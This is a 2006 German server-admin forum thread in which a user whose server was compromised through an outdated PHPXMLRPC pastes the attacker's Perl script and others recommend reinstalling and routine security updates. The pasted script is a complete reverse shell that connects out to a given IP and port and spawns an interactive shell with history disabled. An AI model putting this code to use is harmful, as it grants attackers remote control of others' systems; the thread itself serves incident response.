Page 1 of 1
Server gehackt
Posted: 2006-03-24 11:54
by tofa
Ohje, mein Server wurde offenbar schon wieder gehackt. Mir ist aufgefallen, dass die Systempartition voll lief. Ein Blick in ps- ax offenbarte mir folgendes:
Hinter ping.txt verbirgt sich dieses Script:
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i");
Wie gehe ich am besten vor um herauszufinden, wie der Angreifer auf den Server eindringen konnte? Standardrootkits konnte ich über rkhunter keine finden.
Danke im Vorraus!
Re: Server gehackt
Posted: 2006-03-24 12:39
by rootsvr
zu 90% schlecht programmierte PHP Skripte:
- nicht aktualisiertes phpbb
- ein blindes include("$POST_['site']") in ner Webseite o.ä.
aber guck halt deine Logfiles durch welche Seite davor aufgerufen wurde.
Ansonsten der Standardcheck: aktuelle Software? Alle patches? Sichere Passwörter?
Kleiner Nachtrag
Posted: 2006-03-24 12:44
by tofa
Bei dem vom Script heruntergeladenen ping handelte es sich um Backdoor.Linux.Small.al, allerdings kann ich es nirgends auf dem Server finden.
Und noch ein großes Problem: Die Hauptpartition / ist 34 GB groß und angeblich voll, wenn ich aber mit du -cah / komme ich gerade mal auf 6 GB. Wie ist diese Differenz zu erklären? Ob wohl ein Rootkit installiert ist, er Dateien vor du verbirgt.
Leider habe ich nur per SSH Zugriff auf den Server und kann nicht einfach ein Notfallsystem mounten, um die Partition zu untersuchen. Welche Möglichkeiten habe ich die Speicherfresser zu finden und etwaige rootkits zu eliminieren, die wie clamscan, rkhunter und chkrootkit nicht gefunden werden konnten?
Viele Grüße
tofa
Re: Server gehackt
Posted: 2006-03-24 12:46
by tofa
rootsvr wrote:zu 90% schlecht programmierte PHP Skripte:
Es war wohl ein veraltete Version von PHPXMLRPC. :-/
rootsvr wrote:Ansonsten der Standardcheck: aktuelle Software? Alle patches? Sichere Passwörter?
Bis auf PHPXMLRPC war alles aktuell.
Leider weiß ich nur nicht, wie ich die verursachten Schäden ohne komplette Neuinstallation in den Griff bekommen soll.
Re: Server gehackt
Posted: 2006-03-24 12:51
by chris76
tofa wrote:Leider weiß ich nur nicht, wie ich die verursachten Schäden ohne komplette Neuinstallation in den Griff bekommen soll.
Gar nicht, ich lege dir wirklich eine Komplette Neuinstallation ans Herz!
Re: Server gehackt
Posted: 2006-03-24 13:27
by Joe User
tofa wrote:Leider weiß ich nur nicht, wie ich die verursachten Schäden ohne komplette Neuinstallation in den Griff bekommen soll.
Da Du diese Frage nicht selbst beantworten kannst: Gar nicht!
Es bleibt Dir nur eine Neuinstallation mit anschliessenden und kontinuierlichen Updates aller installierten Software (inklusive aller Scripts). FAQ:
http://www.rootforum.org/faq/14_183_de.html
Re: Server gehackt
Posted: 2006-03-24 13:42
by tofa
Danke für die Antworten. Dann werde ich wohl wie befürchtet nicht um eine Neuinstallation umhinkommen.
Re: Server gehackt
Posted: 2006-04-08 17:34
by umbroboy
Hallo mal,
wie mache ich das am besten, dass ich alle sicherheitsupdates auch mitbekomme und die dann automatisch installiert werden.
Vielleicht per Cronjob? oder gibts da ne coole idee, jetzt z.b. für ein debian system?
Vielen Dank
Re: Server gehackt
Posted: 2006-04-08 18:16
by Joe User
Ein wöchentliches apt-get update && apt-get upgrade, sowie das tägliche Lesen der üblichen Security-Mailinglisten reicht normalerweise aus...
Re: Server gehackt
Posted: 2006-04-08 19:13
by eru der eine
Auch ich kann dir
debian-security@lists.debian.org nur ans Herz legen. Absolut low-traffic, wirklich nur die Meldungen.
Anmeldung gibts hier:
http://lists.debian.org/debian-security-announce/.
Auf die Software, die du nicht aus den Debian-Quellen installiert hast, musst du wohl oder übel selbst aufpassen. Die meisten größeren Projekte im Server- bzw. Internet-Bereich bieten eigene Sicherheits-Mailinglisten oder die Möglichkeit, die sicherheitsrelevanten Bugs per Bugtracker zu abonnieren.
Re: Server gehackt
Posted: 2006-04-10 10:46
by lord_pinhead
umbroboy wrote:
Vielleicht per Cronjob? oder gibts da ne coole idee, jetzt z.b. für ein debian system?
Ne coole idee hab ich, mach es per Hand. Updates macht man nicht per Cronjob, wenn was schiefläuft suchst du ewig bis du den Fehler findest.
Re: Server gehackt
Posted: 2006-04-10 19:48
by ffl
cron-apt ist da allerdings ziemlich sinnvoll, um per Mail auf neue Pakete informiert zu werden, die man dann per Hand installiert.
Re: Server gehackt
Posted: 2006-04-10 22:32
by lord_pinhead
Man wird es doch schaffen einmal am Tag sich kurz einzuloggen und einmal apt-get update && apt-get upgrade einzutippen? Und ausserdem kann man sich Security Bulletins holen um neuste Updates zu sehen (Beispiel:
http://secunia.com/)